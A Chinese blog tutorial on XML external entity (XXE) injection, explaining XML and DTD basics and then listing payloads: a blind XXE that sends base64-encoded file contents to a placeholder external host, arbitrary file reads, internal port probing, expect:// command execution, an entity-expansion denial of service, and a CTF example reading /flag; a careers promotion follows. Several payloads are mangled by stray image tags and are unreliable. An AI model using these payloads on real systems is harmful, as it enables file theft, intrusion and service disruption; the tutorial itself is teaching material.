深入浅出带你了解XML实体注入-CSDN博客

本文链接：https://blog.csdn.net/qq_44005305/article/details/135316865

引文

在平常的WEB渗透中，我们经常会遇到SQL注入、文件上传、SSRF、CSRF等一系列的漏洞，但XXE漏洞在座的读者们了解过吗。今天带大家了解一下这个危险程度同样很高的XXE漏洞。

简介

Xml外部实体注入漏洞（XML External Entity Injection）简称XXE，XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可以构造加载恶意外部文件，进而通过恶意外部文件对服务器进行攻击。

基础知识

在了解XXE漏洞前，我们先看看什么是XML实体。XML根据简单概括为如下：可扩展标记语言 (Extensible Markup Language, XML) ，标准通用标记语言的子集，可以用来标记数据、定义数据类型，是一种允许用户对自己的标记语言进行定义的源语言。 XML是标准通用标记语言可扩展性良好,内容与形式分离,遵循严格的语法要求,保值性良好等优点。

可能单看文字读者们不太好理解，下面给大家简单举个例子：

上图就是一个简单的XML实体，用代码显示可以展示为：

<bookstore> <book category="COOKING"> <title lang="en">Everyday Italian</title> <author>Giada De Laurentiis</author> <year>2005</year> <price>30.00</price> </book> <book category="CHILDREN"> <title lang="en">Harry Potter</title> <author>J K. Rowling</author> <year>2005</year> <price>29.99</price> </book> <book category="WEB"> <title lang="en">Learning XML</title> <author>Erik T. Ray</author> <year>2003</year> <price>39.95</price> </book> </bookstore>

其中根的元素是 bookstore,book中元素有子元素：author、title、year、price。

DTD

DTD（文档类型定义）可以合法的定义xml标签，DTD 可被成行地声明于 XML 文档中，也可作为一个外部引用，接下来带大家详细看一下它的内部结构以更好的去理解。

内部DOCTYPE声明

<?xml version="1.0"?>
<!DOCTYPE note[<!--定义此文档是 note 类型的文档-->
<!ELEMENT note (to,from,heading,body)> <!--定义note元素有四个元素-->
<!ELEMENT X (#PCDATA)> 
<!ELEMENT I (#PCDATA)> 
<!ELEMENT N (#PCDATA)> 
<!ELEMENT O (#PCDATA)> 
]>
<note>
<to>I</to>
<from>A</from>
<head>M</head>
<body>XINO!</body>
</note>

外部DOCTYPE声明

<!DOCTYPE 根元素 SYSTEM "URL">

XML实体注入

了解了上面的基础知识后，我们便可以进一步学习XXE漏洞。

我们要想利用，首先要判断服务器会不会解析XML实体，所以开始时我们先上传一个测试文件来判断服务器是否能解析该类型，如果解析了，我们才可以继续利用这个漏洞。

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY name "hello">
]>
<root>&name;</root>

判断服务器是否解析之后我们可以看看是否支持外部实体调用：

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [ 
<!ENTITY name SYSTEM "vps/hack.dtd">
]>
<root>&name;</root>

判断完之后就可以做进一步测试了，比如：

无回显XXE（BLIND XXE）

我们将获取的数据发送到外部的http服务器上，后面查看http服务器即可查看到提取的数据内容。

举一个最简单的例子：

#test.xml
<!ENTITY % all
"<<img src="http://xxx.xxx.xxx.xxx/x.php?1=%file;'" style="margin: auto" />
>
%all;

对应的payload可以写作为:

<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<<img src="http://xxx.xxx.xxx.xxx/test.xml"" style="margin: auto" />
%remote;
%send;
]>

首先对 remote 引用的目的是将外部文件 test.xml 引入到文中,检测到 send 实体，在节点中引用 send，就可以成功实现数据转发。也就实现了数据的外带。

读取任意文件

这个也是XXE比较常用的方法，我们引入（或编辑）一个DOCTYPE元素，该元素定义一个包含文件路径的外部实体。

探测内网端口

我们利用XXE也可以进行内网探测端口（类似于SSRF），以用来进一步对机器照成攻击：

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY>
<<img src="http://127.0.0.1:80">]" style="margin: auto" />
<root>

命令执行

这个还是比较少见的，因为命令执行的条件比较苛刻，要求靶机php装有expect扩展，但这个扩展是默认不安装的，所以比较难利用。

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<root>
<name>&xxe;</name>
</root>

dos拒绝服务

这个不是很了解，在网上浏览时注意到的，原理大概是利用迭代参数实体进行拒绝服务，让服务器的解析变得非常非常慢。

<?xml version="1.0"?>
<!DOCTYPE xml [
<!ENTITY xxe1 "xxe">
<!ENTITY xxe2 "&xxe1;&xxe1;&xxe1;&xxe1;&xxe1;&xxe1;&xxe1;&xxe1;&xxe1;&xxe1;">
<!ENTITY xxe3 "&xxe2;&xxe2;&xxe2;&xxe2;&xxe2;&xxe2;&xxe2;&xxe2;&xxe2;&xxe2;">
<!ENTITY xxe4 "&xxe3;&xxe3;&xxe3;&xxe3;&xxe3;&xxe3;&xxe3;&xxe3;&xxe3;&xxe3;">
<!ENTITY xxe5 "&xxe4;&xxe4;&xxe4;&xxe4;&xxe4;&xxe4;&xxe4;&xxe4;&xxe4;&xxe4;">
<!ENTITY xxe6 "&xxe5;&xxe5;&xxe5;&xxe5;&xxe5;&xxe5;&xxe5;&xxe5;&xxe5;&xxe5;">
]>
<test>&xxe6;</test>

例题

[PHP]XXE

打开是一个登录界面：

在源码处会发现：

<button id="go" onclick="XMLFunction()">GO!</button>

可以判断会解析XML文件，尝试构造payload直接读取文件：

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root[
<!ENTITY admin SYSTEM "file:///flag">
]>
<root>
<username>&admin;</username>
<password>xino</password>
</root>

抓包构造恶意数据然后发包：

结语

包构造恶意数据然后发包：

结语

今天比较详细的讲了XXE漏洞的原理以及应用方法，有兴趣的小伙伴可以自己去搭建靶机来进行测试，喜欢的小伙伴不妨一键三连。## 题外话

初入计算机行业的人或者大学计算机相关专业毕业生，很多因缺少实战经验，就业处处碰壁。下面我们来看两组数据：

2023届全国高校毕业生预计达到1158万人，就业形势严峻；

国家网络安全宣传周公布的数据显示，到2027年我国网络安全人员缺口将达327万。

一方面是每年应届毕业生就业形势严峻，一方面是网络安全人才百万缺口。

6月9日，麦可思研究2023年版就业蓝皮书（包括《2023年中国本科生就业报告》《2023年中国高职生就业报告》）正式发布。

2022届大学毕业生月收入较高的前10个专业

本科计算机类、高职自动化类专业月收入较高。2022届本科计算机类、高职自动化类专业月收入分别为6863元、5339元。其中，本科计算机类专业起薪与2021届基本持平，高职自动化类月收入增长明显，2022届反超铁道运输类专业（5295元）排在第一位。

具体看专业，2022届本科月收入较高的专业是信息安全（7579元）。对比2018届，电子科学与技术、自动化等与人工智能相关的本科专业表现不俗，较五年前起薪涨幅均达到了19%。数据科学与大数据技术虽是近年新增专业但表现亮眼，已跻身2022届本科毕业生毕业半年后月收入较高专业前三。五年前唯一进入本科高薪榜前10的人文社科类专业——法语已退出前10之列。
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

“没有网络安全就没有国家安全”。当前，网络安全已被提升到国家战略的高度，成为影响国家安全、社会稳定至关重要的因素之一。

网络安全行业特点

1、就业薪资非常高，涨薪快 2022年猎聘网发布网络安全行业就业薪资行业最高人均33.77万！

2、人才缺口大，就业机会多

2019年9月18日《中华人民共和国中央人民政府》官方网站发表：我国网络空间安全人才需求140万人，而全国各大学校每年培养的人员不到1.5W人。猎聘网《2021年上半年网络安全报告》预测2027年网安人才需求300W，现在从事网络安全行业的从业人员只有10W人。

行业发展空间大，岗位非常多

网络安全行业产业以来，随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…

职业增值潜力大

网络安全专业具有很强的技术特性，尤其是掌握工作中的核心网络架构、安全技术，在职业发展上具有不可替代的竞争优势。

随着个人能力的不断提升，所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟，升值空间一路看涨，这也是为什么受大家欢迎的主要原因。

从某种程度来讲，在网络安全领域，跟医生职业一样，越老越吃香，因为技术愈加成熟，自然工作会受到重视，升职加薪则是水到渠成之事。

黑客&网络安全如何学习

今天只要你给我的文章点赞，我私藏的网安学习资料一样免费共享给你们，来看看有哪些东西。